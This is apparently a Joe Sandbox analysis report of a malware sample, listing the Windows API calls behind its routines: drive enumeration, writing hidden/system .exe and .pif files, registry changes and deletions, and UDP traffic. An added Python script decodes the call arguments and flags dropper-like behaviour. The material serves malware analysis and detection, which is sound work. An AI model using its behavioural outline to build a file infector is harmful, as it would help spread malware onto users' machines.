                                                                                                                                                                                                                                    • API ID: CreateThread$AddressProc$CriticalSection$Initialize$LibraryLoad$CloseEnterErrorHandleLeaveModeSleepStartup
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3135310872-0
                                                                                                                                                                                                                                    • Opcode ID: cfdcc725d695a1d5ebbddef2adf02339644189c078a027451bdc2f1abf96eb1c
                                                                                                                                                                                                                                    • Instruction ID: 2da3bf9190753b5b1c5fb8fc75bcee591b7acb00e3e76a19367df3e6650c3eda
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfdcc725d695a1d5ebbddef2adf02339644189c078a027451bdc2f1abf96eb1c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE41DD72BE13457BFB30B691AD1FFA936289B54F01F204154FB09BD0C4AAF036549B6A
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WNetEnumResourceA.MPR(?,?,?,?), ref: 01291A92
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 01291B29
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01283D50), ref: 01291B38
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 01291B76
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01291B83
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,01283D54), ref: 01291BA2
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01291BAF
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.tmp), ref: 01291BD1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,?,00000001,?,?,00000000), ref: 01291C2C
                                                                                                                                                                                                                                      • Part of subcall function 01291060: Sleep.KERNEL32(?,?), ref: 012910BF
                                                                                                                                                                                                                                      • Part of subcall function 01291060: lstrcat.KERNEL32(?,01283D20), ref: 012910DD
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 01291C4B
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001000), ref: 01291C71
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002000), ref: 01291C92
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcat$Sleeplstrlen$lstrcpy$DeleteEnumFileResource
                                                                                                                                                                                                                                    • String ID: .tmp
                                                                                                                                                                                                                                    • API String ID: 3940331287-2986845003
                                                                                                                                                                                                                                    • Opcode ID: e9deaf7069a120ee61c17aa4dbaa474b0e29ee4c7756f5aff45479e25707b44a
                                                                                                                                                                                                                                    • Instruction ID: 53f7f9f23b5eef75ec2c7c6e11ec0a7e278edb0cde8f6300a0c2ab25f1454723
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9deaf7069a120ee61c17aa4dbaa474b0e29ee4c7756f5aff45479e25707b44a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD41BB71A1061A9FCF24DF58DC88FAB7B79AF84302F40C488EA0997184D732EA56CF50
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00004E20), ref: 01293210
                                                                                                                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 01293220
• GetDriveTypeA.KERNEL32(?), ref: 012932A3
• lstrcat.KERNEL32(?,01282740), ref: 012932CA
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 012932E6
• GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0129331B
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0129332F
• ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01293391
• CharLowerA.USER32(?), ref: 0129339E
• lstrlen.KERNEL32(?), ref: 012933AB
• lstrcpy.KERNEL32(?,00000000), ref: 01293479
• GetFileAttributesA.KERNEL32(?), ref: 01293486
• CloseHandle.KERNEL32(?), ref: 01293498
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 012934B4
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 012934E7
• CloseHandle.KERNEL32(000000FF), ref: 012934F4
• SetFileAttributesA.KERNEL32(?,00000007), ref: 01293503
• CloseHandle.KERNEL32(000000FF), ref: 0129351C
• GetFileAttributesA.KERNEL32(?), ref: 01293529
• SetFileAttributesA.KERNEL32(?,00000020), ref: 01293547
• DeleteFileA.KERNEL32(?), ref: 01293554
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0129357F
• GetSystemTime.KERNEL32(?), ref: 0129359F
• SystemTimeToFileTime.KERNEL32(?,?), ref: 012935C8
• lstrcat.KERNEL32(?,.pif), ref: 0129362B
• lstrcat.KERNEL32(?,.exe), ref: 0129363F
• lstrlen.KERNEL32(?,?,00000000), ref: 0129366B
• WriteFile.KERNEL32(?,?,00000000), ref: 01293680
• SetFileTime.KERNEL32(?,?,?,?), ref: 012936A2
• CloseHandle.KERNEL32(?), ref: 012936AF
• SetFileAttributesA.KERNEL32(?,00000007), ref: 012936BE
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 012936DA
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0129370D
• CloseHandle.KERNEL32(000000FF), ref: 0129371A
• SetFileAttributesA.KERNEL32(?,00000007), ref: 01293729
• Sleep.KERNEL32(00001B58), ref: 01293739
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlen$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
• String ID: :$\
• API String ID: 3104407473-1166558509
• Opcode ID: 69433a1008c9aefb1182c4d34c8edb5c1756a00f1df97130fe55635d87e05d59
• Instruction ID: a33085c4652c0a1cbe55f032bbcf4928b65f73a2e4266055c9bad0d3deef8110
• Opcode Fuzzy Hash: 69433a1008c9aefb1182c4d34c8edb5c1756a00f1df97130fe55635d87e05d59
• Instruction Fuzzy Hash: 71518D75D10269DBDF39CB68DC84AEEB776BB89301F0481D9E209E6184D734AAA5CF10
APIs
• Sleep.KERNEL32(00001000,?,?,?,00000000,01298090,01283FF8,000000FF,?,01293AFC,80000001), ref: 012917D9
• wsprintfA.USER32 ref: 012917F8
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0129181A
• RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 01291894
• lstrlen.KERNEL32(?), ref: 012918C4
• lstrlen.KERNEL32(00000000), ref: 012918D0
• Sleep.KERNEL32(00000400), ref: 01291912
• RegCloseKey.ADVAPI32(?), ref: 01291928
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Sleeplstrlen$CloseEnumOpenValuewsprintf
• String ID: %s%s
• API String ID: 1665585142-3252725368
• Opcode ID: 7c96ab623070f5cac4757a96a0a2bf7b8e929b6aee19e8be0775f228178ae69c
• Instruction ID: 26815dcd9cda5024410f6e2525d85f21b15d4ae610e2d6b4ca570aabd8f90fdf
• Opcode Fuzzy Hash: 7c96ab623070f5cac4757a96a0a2bf7b8e929b6aee19e8be0775f228178ae69c
• Instruction Fuzzy Hash: E2517471D10219AFDB20DF98DC89BEEB7B4FB48714F0081D9E609A7280D779AA54CF90
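The two API listings above are easier to read once the raw hex arguments are turned back into SDK names: the first routine opens files for GENERIC_READ/OPEN_EXISTING, rewrites them with GENERIC_WRITE/OPEN_ALWAYS, appends ".pif"/".exe", and sets attribute 0x7 (READONLY|HIDDEN|SYSTEM) on the result, while the second opens a registry key with 0x20019 (KEY_READ). The script below is an added example, not part of the Joe Sandbox report or of the sample; it parses trace lines in the report's "api.MODULE(args), ref: addr" format, decodes the CreateFileA, SetFileAttributesA, RegOpenKeyExA and Sleep arguments from the Windows SDK constant tables, and applies a triage heuristic of my own (the feature names and the "dropper-like" verdict are assumptions, not a Joe Sandbox signature). The sample input is copied from the listings above.

```python
"""Decode and triage Joe Sandbox API-trace lines (added example, not part of the report)."""
import re

# Win32 constants from the SDK headers (winnt.h, fileapi.h, winreg.h) for the calls in the listing.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM", 0x20: "ARCHIVE", 0x80: "NORMAL"}
REG_SAM = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# One trace line: "<api>.<module>(<args>), ref: <addr>"; wsprintfA lines carry no argument list.
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed test input: lines copied from the two function listings above.
SAMPLE = """
• GetDriveTypeA.KERNEL32(?), ref: 012932A3
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 012932E6
• GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0129331B
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 012934B4
• WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 012934E7
• SetFileAttributesA.KERNEL32(?,00000007), ref: 01293503
• lstrcat.KERNEL32(?,.pif), ref: 0129362B
• lstrcat.KERNEL32(?,.exe), ref: 0129363F
• SetFileTime.KERNEL32(?,?,?,?), ref: 012936A2
• Sleep.KERNEL32(00001B58), ref: 01293739
• wsprintfA.USER32 ref: 012917F8
• RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0129181A
""".strip().splitlines()


def parse_line(line):
    """Return (api, module, [args], ref) or None for lines that are not API calls."""
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [a.strip() for a in raw.split(",")]
    return m.group("api"), m.group("module"), args, m.group("ref")


def as_int(arg):
    """Joe Sandbox prints numeric arguments as 8 hex digits; '?' is an unresolved value."""
    return int(arg, 16) if HEX_RE.match(arg) else None


def bits(value, table):
    """Decompose a bit mask into SDK names; bits outside the table are kept as hex."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def decode(api, args):
    """Human-readable view of the arguments for the calls the listings use."""
    if api == "CreateFileA" and len(args) >= 7:
        acc, share, disp, flags = (as_int(args[i]) for i in (1, 2, 4, 5))
        return (f"path={args[0]} access={bits(acc, GENERIC_ACCESS)} share={bits(share, SHARE_MODE)} "
                f"disposition={DISPOSITION.get(disp, disp)} attrs={bits(flags, FILE_ATTR)}")
    if api == "SetFileAttributesA" and len(args) >= 2:
        return f"path={args[0]} attrs={bits(as_int(args[1]), FILE_ATTR)}"
    if api == "RegOpenKeyExA" and len(args) >= 4:
        sam = as_int(args[3])
        return f"sam={REG_SAM.get(sam, hex(sam) if sam is not None else '?')}"
    if api == "Sleep" and args:
        ms = as_int(args[0])
        return f"{ms} ms" if ms is not None else "?"
    return ",".join(args)


def triage(lines):
    """Heuristic (my own, not a sandbox signature): features of a file-writing infector routine."""
    feats = set()
    for api, _, args, _ in filter(None, map(parse_line, lines)):
        if api == "GetDriveTypeA":
            feats.add("enumerates_drives")
        if api == "CreateFileA" and len(args) >= 7 and (as_int(args[1]) or 0) & 0x40000000:
            feats.add("opens_for_write")
        if api == "lstrcat" and args and args[-1].lower() in (".exe", ".pif", ".scr", ".com"):
            feats.add("appends_executable_extension")
        if api == "SetFileAttributesA" and len(args) >= 2:
            attrs = as_int(args[1]) or 0
            if attrs & 0x2 and attrs & 0x4:
                feats.add("hides_file_hidden_system")
        if api == "SetFileTime":
            feats.add("sets_file_time")
    needed = {"enumerates_drives", "opens_for_write", "appends_executable_extension",
              "hides_file_hidden_system"}
    verdict = ("dropper-like: writes hidden/system executables on enumerated drives"
               if needed <= feats else "no dropper pattern")
    return feats, verdict


if __name__ == "__main__":
    for parsed in filter(None, map(parse_line, SAMPLE)):
        api, module, args, ref = parsed
        print(f"{ref} {api}.{module}: {decode(api, args)}")
    print(triage(SAMPLE))
```

Running it against the sample prints the decoded arguments for each call and the feature set; the CreateFileA at 012934B4 comes out as GENERIC_WRITE / FILE_SHARE_WRITE / OPEN_ALWAYS / ARCHIVE and the SetFileAttributesA calls as READONLY|HIDDEN|SYSTEM. To use it on a whole report, feed it the API lines of one function at a time, since the triage heuristic is meant to describe a single routine rather than the process as a whole.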
APIs
• CreateFileA.KERNEL32(C:\Windows\mqiwauwsp.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01285637
• GetFileSize.KERNEL32(000000FF,00000000), ref: 01285659
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 01285691
• ReadFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 012856BB
• lstrcpy.KERNEL32(00000000,C:\Windows\mqiwauwsp.log), ref: 012856CD
• lstrlen.KERNEL32(00000000,00000000), ref: 012856E1
• CloseHandle.KERNEL32(000000FF), ref: 01285725
• GlobalFree.KERNEL32(00000000), ref: 01285755
Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$Global$AllocCloseCreateFreeHandleReadSizelstrcpylstrlen
• String ID: C:\Windows\mqiwauwsp.log
• API String ID: 1499523542-564371081
• Opcode ID: c652846fbf8f9665e1c04c108a3bb0fc6ef2be19b865dbdc1a84aa0a59dee1c0
• Instruction ID: 2cb79f670399e3fa34f0dec1665d99f3b3752f04668bba1aabffd3b84005ccab
• Opcode Fuzzy Hash: c652846fbf8f9665e1c04c108a3bb0fc6ef2be19b865dbdc1a84aa0a59dee1c0
• Instruction Fuzzy Hash: 53418FB195021CEBDB20EB54DC8DBDAB778AB54300F1086D8E319A61D1D7B46AC4CF90
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A599
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(01282114,01282660,00000000,00000000,00000080,012826C0), ref: 0128A5C5
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 0128A5D2
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0128A5EA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0128A635
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(01282114,01282660,?,012826C0), ref: 0128A65A
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(46390628699,00000000), ref: 0128A66C
                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
• String ID: 46390628699
• API String ID: 929466507-4273875350
APIs
• Sleep.KERNEL32(0002BF20), ref: 01288A14
  • Part of subcall function 012844CB: InterlockedExchange.KERNEL32(012990C0,0128A192), ref: 012844E9
• Sleep.KERNEL32 ref: 01288A33
• IsBadWritePtr.KERNEL32(00000110,00000000), ref: 01288B3E
• Sleep.KERNEL32(00001770), ref: 01288B8E
• Sleep.KERNEL32(0001D4C0), ref: 01288BB0
• Sleep.KERNEL32(004B001E), ref: 01288D9D
• RtlExitUserThread.NTDLL(00000000), ref: 01288DD0
Similarity
• API ID: Sleep$ExchangeExitInterlockedThreadUserWrite
• String ID:
• API String ID: 702981705-0
APIs
• Sleep.KERNEL32(000493E0), ref: 012887D1
• CreateThread.KERNEL32(00000000,00000000,012884C1,00000000,00000000,00000000), ref: 0128885C
  • Part of subcall function 012841C6: RtlEnterCriticalSection.NTDLL(01299030), ref: 012841D6
  • Part of subcall function 012841C6: RtlLeaveCriticalSection.NTDLL(01299030), ref: 01284260
• Sleep.KERNEL32(00000200), ref: 01288870
• Sleep.KERNEL32(00000100), ref: 01288884
• Sleep.KERNEL32(00000100), ref: 0128889F
• Sleep.KERNEL32(00000400), ref: 012888BD
• Sleep.KERNEL32(00249F00), ref: 012888D7
• RtlExitUserThread.NTDLL(00000000), ref: 012888E4
Similarity
• API ID: Sleep$CriticalSectionThread$CreateEnterExitLeaveUser
• String ID:
• API String ID: 485722307-0
APIs
• socket.WS2_32(00000002,00000002,00000011), ref: 01287203
• sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0128726D
• select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01287345
• recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01287374
• closesocket.WS2_32(?), ref: 0128750D
Strings
Similarity
• API ID: closesocketrecvfromselectsendtosocket
• String ID: @
• API String ID: 4198204009-2766056989
APIs
• RegOpenKeyExA.KERNEL32(01289F2F,01282E8C,00000000,000F003F,01289F2F), ref: 01288FA0
• RegEnumValueA.KERNEL32(01289F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01288FD7
• RegDeleteValueA.KERNEL32(01289F2F,00000000), ref: 01289000
• RegEnumKeyExA.KERNEL32(01289F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01289038
• wsprintfA.USER32 ref: 0128906B
• RegDeleteKeyA.ADVAPI32(01289F2F,00000000), ref: 01289092
• RegCloseKey.ADVAPI32(01289F2F), ref: 012890AF
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DeleteEnumValue$CloseOpenwsprintf
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2321319729-0
APIs
• RegOpenKeyExA.KERNEL32(80000001,0128244C,00000000,000F003F,?,?), ref: 01292F03
• RegSetValueExA.KERNELBASE(?,01282488,00000000,00000004,00000002,00000004), ref: 01292F31
• RegCloseKey.KERNEL32(?), ref: 01292F3E
• lstrcpy.KERNEL32(00000000,01282550), ref: 01292F99
• lstrcat.KERNEL32(00000000,01282548), ref: 01292FAC
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CloseOpenValuelstrcatlstrcpy
• String ID: >
• API String ID: 1115058322-325317158
APIs
• lstrcpy.KERNEL32(?,?), ref: 01290BC8
• GetTickCount.KERNEL32 ref: 01290BCE
• lstrlen.KERNEL32(?,01283D08,00000000), ref: 01290BE1
• wsprintfA.USER32 ref: 01290BEF
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01290C0E
• CloseHandle.KERNEL32(?), ref: 01290C2A
• DeleteFileA.KERNEL32(?), ref: 01290C37
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: File$CloseCountCreateDeleteHandleTicklstrcpylstrlenwsprintf
• String ID:
• API String ID: 3232967151-0
APIs
• RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 01292E52
• RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01292E6E
• RegCloseKey.ADVAPI32(?), ref: 01292E78
• RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 01292E8C
• RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 01292EA8
• RegCloseKey.ADVAPI32(?), ref: 01292EB2
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: CloseValue$CreateOpen
• String ID:
• API String ID: 2738932338-0
APIs
• wsprintfA.USER32 ref: 01284C2F
• lstrcpy.KERNEL32(?,00000000), ref: 01284CDD
• lstrcpy.KERNEL32(?,00000000), ref: 01284D04
• RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 01284D2E
• lstrlen.KERNEL32(?), ref: 01284D3D
• RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 01284D5D
• RegCloseKey.KERNEL32(?), ref: 01284D6F
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Valuelstrcpy$Closelstrlenwsprintf
• String ID: fronC:\Windows\
• API String ID: 3050549977-3143526458
APIs
• LoadLibraryA.KERNEL32(?), ref: 01317C02
• GetProcAddress.KERNEL32(?,01314FF9), ref: 01317C20
• ExitProcess.KERNEL32(?,01314FF9), ref: 01317C31
• VirtualProtect.KERNEL32(01260000,00001000,00000004,?,00000000), ref: 01317C7F
• VirtualProtect.KERNEL32(01260000,00001000), ref: 01317C94
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1996367037-0
                                                                                                                                                                                                                                    • Opcode ID: 8661ee85e38b5ae502d1d26f5ba9dfee235b242c242208d15a4e6009ea2b6732
                                                                                                                                                                                                                                    • Instruction ID: b1f0b051cec903e806b33b0f70d26963e54fb8610753341dbc0058d78290ca60
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8661ee85e38b5ae502d1d26f5ba9dfee235b242c242208d15a4e6009ea2b6732
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5513672A543164BD7299EBCDCC06A0BBA4FB4523871C0739C7E6C73CAEBA458068760
APIs
• InterlockedIncrement.KERNEL32(012994C8), ref: 01288500
• htons.WS2_32(00000000), ref: 01288559
  • Part of subcall function 0128719B: socket.WS2_32(00000002,00000002,00000011), ref: 01287203
  • Part of subcall function 0128719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0128726D
  • Part of subcall function 0128719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 01287345
• GetTickCount.KERNEL32 ref: 012885C1
  • Part of subcall function 0128719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 01287374
  • Part of subcall function 0128719B: closesocket.WS2_32(?), ref: 0128750D
• InterlockedDecrement.KERNEL32(012994C8), ref: 012886EA
• RtlExitUserThread.NTDLL(00000000), ref: 012886F2
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
Similarity
• API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
• String ID:
• API String ID: 1469894868-0
• Opcode ID: cdfdcc7c1f0234dac66814b81e802b71594fb028cf86b733ef44db5ba886c3ea
• Instruction ID: cc92b4622231a56f41997b4ca64cbf99b2b917ba4ccaf4d2f3edc883fe3c6156
• Opcode Fuzzy Hash: cdfdcc7c1f0234dac66814b81e802b71594fb028cf86b733ef44db5ba886c3ea
• Instruction Fuzzy Hash: 7B518B74910258CFDB24DF28D854BE9B3B8BF44308F5085D9E58DA7289E7B1AAC4CF51
APIs
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 01291DD7
• RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 01291E14
• GetFileAttributesA.KERNEL32(00000000), ref: 01291E3D
• Sleep.KERNEL32(00000100), ref: 01291E73
• RegCloseKey.ADVAPI32(?), ref: 01291E90
Memory Dump Source
• Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
• Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmp
